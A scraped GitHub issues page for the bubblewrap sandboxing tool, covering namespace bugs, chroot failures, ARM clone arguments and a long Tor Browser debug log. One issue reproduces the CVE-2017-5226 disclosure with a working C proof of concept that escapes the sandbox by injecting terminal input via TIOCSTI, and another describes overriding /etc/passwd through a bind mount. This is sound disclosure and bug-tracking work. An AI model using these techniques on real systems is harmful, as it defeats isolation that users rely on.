containers / bubblewrap Goto Github PK

View Code? Open in Web Editor NEW

3.7K 3.7K 226.0 835 KB

Low-level unprivileged sandboxing tool used by Flatpak and similar projects

License: Other

Shell 13.70% C 63.71% Makefile 5.20% M4 6.07% Emacs Lisp 0.02% Python 7.85% Meson 3.45%

linux-containers user-namespaces

bubblewrap's People

Contributors

Stargazers

Watchers

Forkers

matthiasclasen cgwalters mrunalp alexlarsson rhatdan runcom vbatts shaded-enmity bachradsusi larsks opendz cloudxtreme gtristan jjediny probonopd smcv tim-janik ericcurtin giuseppe kentonv hbcbh1999 knoy manoj1991 chrisosaurus qbektrix neuroradiology sahwar versalinyaa adfernandes gbraad safe3 jpakkane petrushka valoq security-geeks emdej stb-tester aandyl aidanhs 4144 tristancacqueray krodyx turbo alexxnica kryndex nabin-info binarycloudmanagement-org jlebon chuanchang handsome-feng pwithnall prateekpandey14 mindspillage vn971 cybershadow nivertech cboylan l0kod eklitzke vcgato29 timofonic-sandboxing bluemutedwisdom najibalghaeth tkuennen kerscher avaer domabrown rowhit onofresouzadh blino tingping kplus timothyebaldwin dlatchx xee5ch iainlane richardmaw-codethink wlin70 gavinwinner sathishscripts pauldc31 tweakoz jiangxll tadeokondrak gicmo madaidan vavilon frzifus perfinion saucec0de roadk1ll gbarboza mkrajnak dhodovsk tomsweeneyredhat prayog-lab thejj swick noppnopp 5l1v3r1

bubblewrap's Issues

Inappropriate ioctl for device

version 0.1.6 produces the following error message:

./bwrap --bind / / --proc /proc --dev /dev bash

bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell

Everything still appears to work.

Tested on debian (nosuid) and arch (with and without suid)

Failures in chroot

In our Endless image builder, we chroot into the ostree deployment to install apps with flatpak. The triggers always fail for 2 reasons:

The slave mounting of / fails because the deployment directory is not actually a mountpoint. This is easily fixed by doing a bind mount before hand, but I think this can be done in bubblewrap, too. Systemd does this - https://github.com/systemd/systemd/blob/master/src/core/namespace.c#L910.
pivot_root fails with EINVAL for reasons I can't quite grok. See https://github.com/torvalds/linux/blob/master/fs/namespace.c#L3035. FWIW, I can't really see why the pivot_root is needed. It seems that you could just build up the newroot, then move the mount over /. This is also what systemd does. It used to use pivot_root, but changed that in systemd/systemd@ac0930c.

no default user namespace

From the manpage

By default, bwrap creates a new user namespace for the sandbox.

But it doesn't!
If --unshare-user is not used, there is no new user namespace if bubblewrap is used with suid permissions.

running on a system with unprivileged user namespaces available: (without suid)
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash

ls -l shows:

drwxr-xr-x 4 myuser myuser 300 Jan 7 13:37 dev
drwxr-xr-x 74 nobody nobody 4096 Jan 7 13:09 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 13:37 lib64 -> usr/lib64
dr-xr-xr-x 187 nobody nobody 0 Jan 7 12:32 proc
drwxr-xr-x 8 nobody nobody 4096 Dec 10 13:22 usr

running with suid permissions:
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash

ls -l shows:

drwxr-xr-x 4 myuser myuser 300 Jan 7 11:43 dev
drwxr-xr-x 74 root root 4096 Jan 7 11:36 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 11:43 lib64 -> usr/lib64
dr-xr-xr-x 187 root root 0 Jan 7 11:11 proc
drwxr-xr-x 8 root root 4096 Dec 10 13:22 usr

This is by default inside a mount namespace, but not inside a user namespace
https://github.com/projectatomic/bubblewrap/blob/master/bubblewrap.c#L1636

being able to override root owned files inside a mount namespace but with the real user namespace might create unexpected security issues

bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --bind /tmp/mypasswd /etc/passwd --proc /proc --dev /dev bash

so now we have an environment inside a mount namespace but in the real user namespace, with a user specified passwd file

since / is mounted nosuid, that does not allow root by simply running 'su' after changing passwd

But there are files that include permission rules to restrict the user, so exploiting this should be possible.

Some more thoughts:

Are namespaces supposed to be used by normal users outside a (unprivileged) user namespace?
They were probably not designed to be used with suid.

also:
running 'mkdir /test' will create a user owned directory in /

drwx------ 2 myuser myuser 40 Jan 7 11:46 test

Why is / owned by the user and not by root?
Shouldn't the permissions be the same as on the original system?
The same goes for files included with --bind

User namespaces or not, being able to do --bind /tmp/myfile /etc/passwd is scary.

Maybe binded files should have the same permissions as the target directory

mounting a tmpfs on root owned files seems fine, assuming the permissions don't change (mounting a tmpfs on /etc should result in an empty /etc directory owned by root(or rather "nobody"), not by the user)

provide an option to set argv[0]

In some cases, programs vary behavior based on argv[0], but we currently do:

  if (execvp (argv[0], argv) == -1)

requiring them to be the same. We should add --argv0 /usr/bin/blah or so.

move fs templating out via static copy, handling /tmp

Right now we have a lot of API surface to create files and such. Are we sure we need an internal tmpfs in order to pivot cleanly? If we assume the host's /tmp is tmpfs, it seems not so bad to just leak that? Maybe....or maybe we change systemd to mount /run/user/$uid/tmpfs as a separate fs by default? (Or use FUSE...)

Actually regarding /tmp, in fact, we should probably use /tmp/containers-XXXXX for /tmp in the container so that the host's systemd-tmpfiles cleans it up properly.

optionally drop groups

Right now on my desktop system i'm in e.g. the mock group, and that gets propagated into containers that are run.

Dropping groups is an interesting topic (https://lwn.net/Articles/621612/) but honestly I suspect we could just say that if you install this tool, you can't use groups-for-negative-security?

Recursive readonly binds broken

If i do:
bwrap --bind / / --ro-bind /mnt /mnt sh

Then /mnt is readonly, but sub-mounts like /mnt/some-mount are still read-write.

Test suite

We should have a test suite.

CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl

On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <[email protected]> writes:

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin
--ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.

setsid() workaround in 0.1.6 breaks interactive terminals

The change in #143 breaks the use of bwrap for interactive sessions. For instance, if you run bwrap --bind / / sh, and then press ctrl-Zthe "outer" shell gets unfrozen, but the "inner" shell doesn't get frozen, and both try to read terminal input at the same time.

Doesn't work on CentOS 7

[centos@localhost ~]$ bwrap --unshare-user-try --ro-bind / / /bin/true
Creating new namespace failed, likely because the kernel does not support user namespaces.  bwrap must be installed setuid on such systems.
[centos@localhost ~]$ ls -l /usr/bin/bwrap 
-rwsr-xr-x. 1 root root 45432 Sep 23 20:00 /usr/bin/bwrap
[centos@localhost ~]$ uname -a
Linux localhost 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[centos@localhost boot]$ egrep "(NAMESPACES|_NS=)" /boot/config-3.10.0-327.36.1.el7.x86_64 
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_NF_CONNTRACK_NETBIOS_NS=m

I may be mising something obvious here.

Incorrect sys_clone() arguments on ARM?

With the default configuration, installing or uninstalling an application with flatpak throws:

# flatpak install gnome-apps org.gnome.iagno

1 delta parts, 1 loose fetched; 432 KiB transferred in 4 seconds                                                                                                                                                   
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Installing related: org.gnome.iagno.Locale

1 delta parts, 1 loose fetched; 714 KiB transferred in 5 seconds

Turns out that my ARM setup wants the arguments in another order:

$ grep CLONE /boot/config-4.4.11-ntc 
CONFIG_CLONE_BACKWARDS=y

It also seems to be the default upstream kernel configuration:

$ grep CLONE_BACKWARDS arch/arm/Kconfig
    select CLONE_BACKWARDS

It's the default for:

ARC
ARM
ARM64
MIPS
PA-RISC
PPC
x86 with the x86-32 support
Xtensa

CRIS and S390 (already handled) uses BACKWARDS2
Microblaze uses BACKWARDS3

I'm guessing the cases in bubblewrap are incomplete, there's 3 here, plus the "normal" case:

#
# ABI hall of shame
#
config CLONE_BACKWARDS
        bool
        help
          Architecture has tls passed as the 4th argument of clone(2),
          not the 5th one.

config CLONE_BACKWARDS2
        bool
        help
          Architecture has the first two arguments of clone(2) swapped.

config CLONE_BACKWARDS3
        bool
        help
          Architecture has tls passed as the 3rd argument of clone(2),
          not the 5th one.

Swapping the arguments on ARM as on S390 fixed the warnings, though I'm unsure that's the correct fix, as the first few arguments seem correct. Is there not a way to do with going through the glibc instead?

Should have an option to terminate sandbox when PID 2 dies

I saw that if a flatpak app somehow triggers another process to be spawned, when it quits, that spawned process can linger around.
That's bad, because if another app runs later, it may find the initial process and pick it up instead of spawning it again, except that the old process may be pointing to paths or state that don't exist anymore.

Discussing this with @matthiasclasen on IRC, we thought that bubblewrap should provide an option to terminate the sandbox also when the PID 2 dies, to prevent this from happening.

Unable to run even though I appear to have all relevant features except CONFIG_USER_NS

Hi,

I'm trying to install a Flatpak app on a distro which predates Flatpak support.

Error message:

Creating new namespace failed, likely because the kernel does not support user namespaces. bwrap must be installed setuid on such systems.

The kernel has got the following:
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_DEVPTS_MULTIPLE_INSTANCES=y
CONFIG_OVERLAYFS_FS=m
(There may be a spelling error in CONFIG_OVERLAYFS_FS in issue #87.)

-rwsr-xr-x 1 root root 164080 Jan 6 04:55 /usr/local/bin/bwrap*

Version is bubblewrap 0.1.5.

Any suggestions?

breaks with /proc/xen mounted (QubesOS)

Using Qubes Debian jessie based AppVM with bubblewrap from jessie-backports (version 0.1.4-2~bpo8+1).

(Neither AppArmor nor grsecurity is being involved.)

Here are instructions on how to reproduce this in Qubes:
QubesOS/qubes-issues#2540

user@host:~/sandbox$ ./sandboxed-tor-browser -debug
2016/12/25 05:35:20 launch: Starting.
2016/12/25 05:35:20 launch: Connecting to the Tor network.
2016/12/25 05:35:20 launch: Starting Tor Browser.
2016/12/25 05:35:20 sandbox: User namespace support detected.
2016/12/25 05:35:20 dynlib: ELF AUXV AT_HWCAP: 0000000000000000
2016/12/25 05:35:20 dynlib: osVersion: 0004041f
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libpng12.so.0: [/lib/x86_64-linux-gnu/libpng12.so.0 /usr/lib/x86_64-linux-gnu/libpng12.so.0]
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libusb-0.1.so.4: [/lib/x86_64-linux-gnu/libusb-0.1.so.4 /usr/lib/x86_64-linux-gnu/libusb-0.1.so.4]
2016/12/25 05:35:20 sandbox: ld.so appears to be '/lib64/ld-linux-x86-64.so.2' -> /lib/x86_64-linux-gnu/ld-2.19.so.
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: Appending extra libs: [libxcb.so.1 libXau.so.6 libXdmcp.so.6 libadwaita.so libprintbackend-file.so libpixbufloader-png.so]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libfreebl3.so imports: [libnssutil3.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/liblgpllibs.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libmozsqlite3.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnss3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssckbi.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssdbm3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsmime3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsoftokn3.so imports: [libmozsqlite3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libssl3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libxul.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libnss3.so libsmime3.so libssl3.so libnssutil3.so libmozsqlite3.so libplds4.so libplc4.so libnspr4.so liblgpllibs.so libfreetype.so.6 libfontconfig.so.1 librt.so.1 libXrender.so.1 libasound.so.2 libdbus-glib-1.so.2 libdbus-1.so.3 libgobject-2.0.so.0 libglib-2.0.so.0 libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libgdk_pixbuf-2.0.so.0 libpango-1.0.so.0 libcairo.so.2 libX11.so.6 libXext.so.6 libXt.so.6 libgthread-2.0.so.0 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdl.so.2 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libasound.so.2 imports: [libm.so.6 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 imports: [libpthread.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 imports: [libfreetype.so.6 libexpat.so.1 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libX11.so.6 imports: [libxcb.so.1 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libgcc_s.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb.so.1 imports: [libXau.so.6 libXdmcp.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libm.so.6 libthai.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/librt.so.1 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 imports: [libglib-2.0.so.0 libffi.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libharfbuzz.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2 imports: [libdbus-1.so.3 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libglib-2.0.so.0 imports: [libpcre.so.3 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libcairo.so.2 imports: [libpthread.so.0 libpixman-1.so.0 libfontconfig.so.1 libfreetype.so.6 libpng12.so.0 libxcb-shm.so.0 libxcb-render.so.0 libxcb.so.1 libXrender.so.1 libX11.so.6 libXext.so.6 libz.so.1 librt.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpthread.so.0 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libstdc++.so.6 imports: [libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so imports: [libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libpango-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libglib-2.0.so.0 libz.so.1 libselinux.so.1 libresolv.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0 imports: [libpangocairo-1.0.so.0 libpango-1.0.so.0 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libXrender.so.1 libXinerama.so.1 libXi.so.6 libXrandr.so.2 libXcursor.so.1 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libcairo.so.2 libX11.so.6 libXext.so.6 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0 imports: [libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXext.so.6 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXt.so.6 imports: [libSM.so.6 libICE.so.6 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libc.so.6 imports: [ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXau.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libatk-1.0.so.0 imports: [libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so imports: [libgdk_pixbuf-2.0.so.0 libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangocairo-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libcairo.so.2 libm.so.6 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libasan.so.2 imports: [librt.so.1 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libm.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/printbackends/libprintbackend-file.so imports: [libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdbus-1.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 imports: [libgdk-x11-2.0.so.0 libgmodule-2.0.so.0 libpangocairo-1.0.so.0 libX11.so.6 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libatk-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libpango-1.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfreetype.so.6 imports: [libz.so.1 libpng12.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrender.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdamage.so.1 imports: [libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXfixes.so.3 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 imports: []
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libexpat.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXi.so.6 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libresolv.so.2 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcomposite.so.1 imports: [libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libSM.so.6 imports: [libICE.so.6 libuuid.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libICE.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpcre.so.3 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpixman-1.so.0 imports: [libm.so.6 libpthread.so.0 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0 imports: [libxcb.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpng12.so.0 imports: [libz.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libz.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXinerama.so.1 imports: [libX11.so.6 libXext.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXcursor.so.1 imports: [libXrender.so.1 libXfixes.so.3 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0 imports: [libdl.so.2 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libthai.so.0 imports: [libdatrie.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libharfbuzz.so.0 imports: [libglib-2.0.so.0 libfreetype.so.6 libgraphite2.so.3 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libffi.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libselinux.so.1 imports: [libpcre.so.3 libdl.so.2 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXrandr.so.2 imports: [libXext.so.6 libXrender.so.1 libX11.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libuuid.so.1 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdatrie.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgraphite2.so.3 imports: [libc.so.6]
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libc-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdbus-1.so.3.8.13
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libdl-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libexpat.so.1.6.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libgcc_s.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libglib-2.0.so.0.4200.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libm-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpcre.so.3.13.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpng12.so.0.50.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libpthread-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libresolv-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/librt-2.19.so
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libselinux.so.1
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libuuid.so.1.3.0
2016/12/25 05:35:20 sandbox: lib: /lib/x86_64-linux-gnu/libz.so.1.2.8
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libICE.so.6.3.0
2016/12/25 05:35:20 sandbox: lib: /usr/lib/x86_64-linux-gnu/libSM.so.6.0.1
